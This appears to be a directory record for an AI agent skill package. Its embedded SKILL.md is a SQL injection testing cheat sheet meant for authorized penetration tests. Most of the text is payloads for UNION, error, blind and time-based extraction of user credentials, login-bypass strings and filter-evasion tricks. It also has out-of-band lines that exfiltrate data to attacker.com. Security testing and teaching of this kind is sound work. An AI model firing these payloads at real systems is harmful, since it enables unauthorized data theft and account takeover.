{ "schemaVersion": "1.0", "item": { "slug": "sql-injection-testing", "name": "SQL Injection Testing", "source": "tencent", "type": "skill", "category": "开发工具", "sourceUrl": "https://clawhub.ai/brandonwise/sql-injection-testing", "canonicalUrl": "https://clawhub.ai/brandonwise/sql-injection-testing", "targetPlatform": "OpenClaw" }, "install": { "downloadMode": "redirect", "downloadUrl": "/downloads/sql-injection-testing", "sourceDownloadUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=sql-injection-testing", "sourcePlatform": "tencent", "targetPlatform": "OpenClaw", "installMethod": "Manual import", "extraction": "Extract archive", "prerequisites": [ "OpenClaw" ], "packageFormat": "ZIP package", "includedAssets": [ "SKILL.md" ], "primaryDoc": "SKILL.md", "quickSetup": [ "Download the package from Yavira.", "Extract the archive and review SKILL.md first.", "Import or place the package into your OpenClaw setup." ], "agentAssist": { "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.", "steps": [ "Download the package from Yavira.", "Extract it into a folder your agent can access.", "Paste one of the prompts below and point your agent at the extracted folder." ], "prompts": [ { "label": "New install", "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Tell me what you changed and call out any manual steps you could not complete." }, { "label": "Upgrade existing", "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Summarize what changed and any follow-up checks I should run." } ] }, "sourceHealth": { "source": "tencent", "slug": "sql-injection-testing", "status": "healthy", "reason": "direct_download_ok", "recommendedAction": "download", "checkedAt": "2026-05-08T09:18:41.984Z", "expiresAt": "2026-05-15T09:18:41.984Z", "httpStatus": 200, "finalUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=sql-injection-testing", "contentType": "application/zip", "probeMethod": "head", "details": { "probeUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=sql-injection-testing", "contentDisposition": "attachment; filename=\"sql-injection-testing-1.0.0.zip\"", "redirectLocation": null, "bodySnippet": null, "slug": "sql-injection-testing" }, "scope": "item", "summary": "Item download looks usable.", "detail": "Yavira can redirect you to the upstream package for this item.", "primaryActionLabel": "Download for OpenClaw", "primaryActionHref": "/downloads/sql-injection-testing" }, "validation": { "installChecklist": [ "Use the Yavira download entry.", "Review SKILL.md after the package is downloaded.", "Confirm the extracted package contains the expected setup assets." ], "postInstallChecks": [ "Confirm the extracted package includes the expected docs or setup files.", "Validate the skill or prompts are available in your target agent workspace.", "Capture any manual follow-up steps the agent could not complete." ] }, "downloadPageUrl": "https://openagent3.xyz/downloads/sql-injection-testing", "agentPageUrl": "https://openagent3.xyz/skills/sql-injection-testing/agent", "manifestUrl": "https://openagent3.xyz/skills/sql-injection-testing/agent.json", "briefUrl": "https://openagent3.xyz/skills/sql-injection-testing/agent.md" }, "agentAssist": { "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.", "steps": [ "Download the package from Yavira.", "Extract it into a folder your agent can access.", "Paste one of the prompts below and point your agent at the extracted folder." ], "prompts": [ { "label": "New install", "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Tell me what you changed and call out any manual steps you could not complete." }, { "label": "Upgrade existing", "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Summarize what changed and any follow-up checks I should run." } ] }, "documentation": { "source": "clawhub", "primaryDoc": "SKILL.md", "sections": [ { "title": "SQL Injection Testing", "body": "Comprehensive SQL injection vulnerability assessment techniques for web applications, covering detection, exploitation, and defense validation." }, { "title": "Description", "body": "USE WHEN:\n\nTesting for SQL injection vulnerabilities\nPerforming authorized penetration tests\nValidating input sanitization mechanisms\nBypassing authentication for security testing\nExtracting database information (authorized)\nLearning SQL injection defense\n\nDON'T USE WHEN:\n\nNo written authorization for testing\nTesting production systems with real user data\nIntent is malicious (don't be evil)\n\n⚠️ LEGAL REQUIREMENT: Written penetration testing authorization required before use." }, { "title": "Injection Point Identification", "body": "Common injectable parameters:\n\nURL params: ?id=1, ?user=admin, ?category=books\nForm fields: username, password, search, comments\nCookies: session_id, user_preference\nHTTP headers: User-Agent, Referer, X-Forwarded-For" }, { "title": "Basic Vulnerability Tests", "body": "-- Single quote test\n'\n\n-- Double quote test\n\"\n\n-- Comment sequences\n--\n#\n/**/\n\n-- Semicolon for query stacking\n;\n\nWatch for:\n\nDatabase error messages\nHTTP 500 errors\nModified response content/length\nUnexpected behavior changes" }, { "title": "Boolean Logic Tests", "body": "-- True condition (should return data)\npage.asp?id=1 or 1=1\npage.asp?id=1' or 1=1--\npage.asp?id=1\" or 1=1--\n\n-- False condition (should return nothing/error)\npage.asp?id=1 and 1=2\npage.asp?id=1' and 1=2--\n\nCompare responses between true/false to confirm injection." }, { "title": "UNION-Based Extraction", "body": "-- Step 1: Determine column count\nORDER BY 1--\nORDER BY 2--\nORDER BY 3--\n-- Continue until error occurs\n\n-- Step 2: Find displayable columns\nUNION SELECT NULL,NULL,NULL--\nUNION SELECT 'a',NULL,NULL--\nUNION SELECT NULL,'a',NULL--\n\n-- Step 3: Extract data\nUNION SELECT username,password,NULL FROM users--\nUNION SELECT table_name,NULL,NULL FROM information_schema.tables--\nUNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--" }, { "title": "Error-Based Extraction", "body": "-- MSSQL\n1' AND 1=CONVERT(int,(SELECT @@version))--\n\n-- MySQL (XPATH)\n1' AND extractvalue(1,concat(0x7e,(SELECT @@version)))--\n\n-- PostgreSQL\n1' AND 1=CAST((SELECT version()) AS int)--" }, { "title": "Blind Boolean-Based", "body": "-- Character extraction\n1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--\n1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='b'--\n\n-- Conditional responses\n1' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0--" }, { "title": "Time-Based Blind", "body": "-- MySQL\n1' AND IF(1=1,SLEEP(5),0)--\n1' AND IF((SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a',SLEEP(5),0)--\n\n-- MSSQL\n1'; WAITFOR DELAY '0:0:5'--\n\n-- PostgreSQL\n1'; SELECT pg_sleep(5)--" }, { "title": "Out-of-Band (OOB)", "body": "-- MSSQL DNS exfiltration\n1; EXEC master..xp_dirtree '\\\\attacker-server.com\\share'--\n\n-- MySQL DNS\n1' UNION SELECT LOAD_FILE(CONCAT('\\\\\\\\',@@version,'.attacker.com\\\\a'))--\n\n-- Oracle HTTP\n1' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual--" }, { "title": "Authentication Bypass", "body": "-- Classic bypass payloads\nadmin'--\nadmin'/*\n' OR '1'='1\n' OR '1'='1'--\n' OR '1'='1'/*\n') OR ('1'='1\n') OR ('1'='1'--\n\n-- Query transformation example\n-- Original: SELECT * FROM users WHERE username='input' AND password='input'\n-- Injected (username: admin'--):\n-- SELECT * FROM users WHERE username='admin'--' AND password='anything'\n-- Password check bypassed!" }, { "title": "Character Encoding", "body": "-- URL encoding\n%27 (single quote)\n%22 (double quote)\n%23 (hash)\n\n-- Double URL encoding\n%2527 (single quote)\n\n-- Hex strings (MySQL)\nSELECT * FROM users WHERE name=0x61646D696E -- 'admin'" }, { "title": "Whitespace Alternatives", "body": "-- Comment substitution\nSELECT/**/username/**/FROM/**/users\n\n-- Tab character\nSELECT%09username%09FROM%09users\n\n-- Newline\nSELECT%0Ausername%0AFROM%0Ausers" }, { "title": "Keyword Evasion", "body": "-- Case variation\nSeLeCt, sElEcT, SELECT\n\n-- Inline comments\nSEL/*bypass*/ECT\nUN/*bypass*/ION\n\n-- Double writing (if filter removes once)\nSELSELECTECT → SELECT\nUNUNIONION → UNION" }, { "title": "Database Fingerprinting", "body": "DatabaseVersion QueryMySQLSELECT @@version or SELECT version()MSSQLSELECT @@versionPostgreSQLSELECT version()OracleSELECT banner FROM v$versionSQLiteSELECT sqlite_version()" }, { "title": "Information Schema Queries", "body": "-- MySQL/MSSQL: List tables\nSELECT table_name FROM information_schema.tables WHERE table_schema=database()\n\n-- List columns\nSELECT column_name FROM information_schema.columns WHERE table_name='users'\n\n-- Oracle equivalent\nSELECT table_name FROM all_tables\nSELECT column_name FROM all_tab_columns WHERE table_name='USERS'" }, { "title": "Quick Reference", "body": "PurposePayloadBasic test' or \"Boolean trueOR 1=1--Boolean falseAND 1=2--Comment (MySQL)# or -- Comment (MSSQL)--UNION probeUNION SELECT NULL--Time delayAND SLEEP(5)--Auth bypass' OR '1'='1" }, { "title": "Detection Test Sequence", "body": "1. Insert ' → Check for error\n2. Insert \" → Check for error\n3. Try: OR 1=1-- → Check for behavior change\n4. Try: AND 1=2-- → Check for behavior change\n5. Try: ' WAITFOR DELAY '0:0:5'-- → Check for delay" }, { "title": "❌ Vulnerable", "body": "const query = `SELECT * FROM users WHERE id = '${userId}'`;" }, { "title": "✅ Safe", "body": "// Parameterized query\nconst query = 'SELECT * FROM users WHERE id = $1';\nconst result = await db.query(query, [userId]);\n\n// OR use ORM\nconst user = await prisma.user.findUnique({ where: { id: userId } });" }, { "title": "Tools", "body": "SQLMap: Automated SQL injection\nBurp Suite: Request manipulation\nOWASP ZAP: Web app scanner\nHavij: SQL injection tool" }, { "title": "Troubleshooting", "body": "ProblemSolutionNo error messagesUse blind injection (boolean/time-based)UNION failsCheck column count with ORDER BYWAF blockingUse encoding/evasion techniquesPayload not executingVerify correct comment syntax for DB typeTime-based inconsistentUse longer delays (10+ seconds)" }, { "title": "Ethical Guidelines", "body": "Never execute destructive queries (DROP, DELETE) without explicit authorization\nLimit data extraction to proof-of-concept quantities\nStop immediately upon detecting production data\nReport critical vulnerabilities through agreed channels\nDocument all activities for audit trail" } ], "body": "SQL Injection Testing\n\nComprehensive SQL injection vulnerability assessment techniques for web applications, covering detection, exploitation, and defense validation.\n\nDescription\n\nUSE WHEN:\n\nTesting for SQL injection vulnerabilities\nPerforming authorized penetration tests\nValidating input sanitization mechanisms\nBypassing authentication for security testing\nExtracting database information (authorized)\nLearning SQL injection defense\n\nDON'T USE WHEN:\n\nNo written authorization for testing\nTesting production systems with real user data\nIntent is malicious (don't be evil)\n\n⚠️ LEGAL REQUIREMENT: Written penetration testing authorization required before use.\n\nDetection Phase\nInjection Point Identification\n\nCommon injectable parameters:\n\nURL params: ?id=1, ?user=admin, ?category=books\nForm fields: username, password, search, comments\nCookies: session_id, user_preference\nHTTP headers: User-Agent, Referer, X-Forwarded-For\n\nBasic Vulnerability Tests\n-- Single quote test\n'\n\n-- Double quote test\n\"\n\n-- Comment sequences\n--\n#\n/**/\n\n-- Semicolon for query stacking\n;\n\n\nWatch for:\n\nDatabase error messages\nHTTP 500 errors\nModified response content/length\nUnexpected behavior changes\nBoolean Logic Tests\n-- True condition (should return data)\npage.asp?id=1 or 1=1\npage.asp?id=1' or 1=1--\npage.asp?id=1\" or 1=1--\n\n-- False condition (should return nothing/error)\npage.asp?id=1 and 1=2\npage.asp?id=1' and 1=2--\n\n\nCompare responses between true/false to confirm injection.\n\nExploitation Techniques\nUNION-Based Extraction\n-- Step 1: Determine column count\nORDER BY 1--\nORDER BY 2--\nORDER BY 3--\n-- Continue until error occurs\n\n-- Step 2: Find displayable columns\nUNION SELECT NULL,NULL,NULL--\nUNION SELECT 'a',NULL,NULL--\nUNION SELECT NULL,'a',NULL--\n\n-- Step 3: Extract data\nUNION SELECT username,password,NULL FROM users--\nUNION SELECT table_name,NULL,NULL FROM information_schema.tables--\nUNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--\n\nError-Based Extraction\n-- MSSQL\n1' AND 1=CONVERT(int,(SELECT @@version))--\n\n-- MySQL (XPATH)\n1' AND extractvalue(1,concat(0x7e,(SELECT @@version)))--\n\n-- PostgreSQL\n1' AND 1=CAST((SELECT version()) AS int)--\n\nBlind Boolean-Based\n-- Character extraction\n1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--\n1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='b'--\n\n-- Conditional responses\n1' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0--\n\nTime-Based Blind\n-- MySQL\n1' AND IF(1=1,SLEEP(5),0)--\n1' AND IF((SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a',SLEEP(5),0)--\n\n-- MSSQL\n1'; WAITFOR DELAY '0:0:5'--\n\n-- PostgreSQL\n1'; SELECT pg_sleep(5)--\n\nOut-of-Band (OOB)\n-- MSSQL DNS exfiltration\n1; EXEC master..xp_dirtree '\\\\attacker-server.com\\share'--\n\n-- MySQL DNS\n1' UNION SELECT LOAD_FILE(CONCAT('\\\\\\\\',@@version,'.attacker.com\\\\a'))--\n\n-- Oracle HTTP\n1' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual--\n\nAuthentication Bypass\n-- Classic bypass payloads\nadmin'--\nadmin'/*\n' OR '1'='1\n' OR '1'='1'--\n' OR '1'='1'/*\n') OR ('1'='1\n') OR ('1'='1'--\n\n-- Query transformation example\n-- Original: SELECT * FROM users WHERE username='input' AND password='input'\n-- Injected (username: admin'--):\n-- SELECT * FROM users WHERE username='admin'--' AND password='anything'\n-- Password check bypassed!\n\nFilter Bypass Techniques\nCharacter Encoding\n-- URL encoding\n%27 (single quote)\n%22 (double quote)\n%23 (hash)\n\n-- Double URL encoding\n%2527 (single quote)\n\n-- Hex strings (MySQL)\nSELECT * FROM users WHERE name=0x61646D696E -- 'admin'\n\nWhitespace Alternatives\n-- Comment substitution\nSELECT/**/username/**/FROM/**/users\n\n-- Tab character\nSELECT%09username%09FROM%09users\n\n-- Newline\nSELECT%0Ausername%0AFROM%0Ausers\n\nKeyword Evasion\n-- Case variation\nSeLeCt, sElEcT, SELECT\n\n-- Inline comments\nSEL/*bypass*/ECT\nUN/*bypass*/ION\n\n-- Double writing (if filter removes once)\nSELSELECTECT → SELECT\nUNUNIONION → UNION\n\nDatabase Fingerprinting\nDatabase\tVersion Query\nMySQL\tSELECT @@version or SELECT version()\nMSSQL\tSELECT @@version\nPostgreSQL\tSELECT version()\nOracle\tSELECT banner FROM v$version\nSQLite\tSELECT sqlite_version()\nInformation Schema Queries\n-- MySQL/MSSQL: List tables\nSELECT table_name FROM information_schema.tables WHERE table_schema=database()\n\n-- List columns\nSELECT column_name FROM information_schema.columns WHERE table_name='users'\n\n-- Oracle equivalent\nSELECT table_name FROM all_tables\nSELECT column_name FROM all_tab_columns WHERE table_name='USERS'\n\nQuick Reference\nPurpose\tPayload\nBasic test\t' or \"\nBoolean true\tOR 1=1--\nBoolean false\tAND 1=2--\nComment (MySQL)\t# or --\nComment (MSSQL)\t--\nUNION probe\tUNION SELECT NULL--\nTime delay\tAND SLEEP(5)--\nAuth bypass\t' OR '1'='1\nDetection Test Sequence\n1. Insert ' → Check for error\n2. Insert \" → Check for error\n3. Try: OR 1=1-- → Check for behavior change\n4. Try: AND 1=2-- → Check for behavior change\n5. Try: ' WAITFOR DELAY '0:0:5'-- → Check for delay\n\nPrevention (What to Look For in Code Review)\n❌ Vulnerable\nconst query = `SELECT * FROM users WHERE id = '${userId}'`;\n\n✅ Safe\n// Parameterized query\nconst query = 'SELECT * FROM users WHERE id = $1';\nconst result = await db.query(query, [userId]);\n\n// OR use ORM\nconst user = await prisma.user.findUnique({ where: { id: userId } });\n\nTools\nSQLMap: Automated SQL injection\nBurp Suite: Request manipulation\nOWASP ZAP: Web app scanner\nHavij: SQL injection tool\nTroubleshooting\nProblem\tSolution\nNo error messages\tUse blind injection (boolean/time-based)\nUNION fails\tCheck column count with ORDER BY\nWAF blocking\tUse encoding/evasion techniques\nPayload not executing\tVerify correct comment syntax for DB type\nTime-based inconsistent\tUse longer delays (10+ seconds)\nEthical Guidelines\nNever execute destructive queries (DROP, DELETE) without explicit authorization\nLimit data extraction to proof-of-concept quantities\nStop immediately upon detecting production data\nReport critical vulnerabilities through agreed channels\nDocument all activities for audit trail" }, "trust": { "sourceLabel": "tencent", "provenanceUrl": "https://clawhub.ai/brandonwise/sql-injection-testing", "publisherUrl": "https://clawhub.ai/brandonwise/sql-injection-testing", "owner": "brandonwise", "version": "1.0.0", "license": null, "verificationStatus": "Indexed source record" }, "links": { "detailUrl": "https://openagent3.xyz/skills/sql-injection-testing", "downloadUrl": "https://openagent3.xyz/downloads/sql-injection-testing", "agentUrl": "https://openagent3.xyz/skills/sql-injection-testing/agent", "manifestUrl": "https://openagent3.xyz/skills/sql-injection-testing/agent.json", "briefUrl": "https://openagent3.xyz/skills/sql-injection-testing/agent.md" } }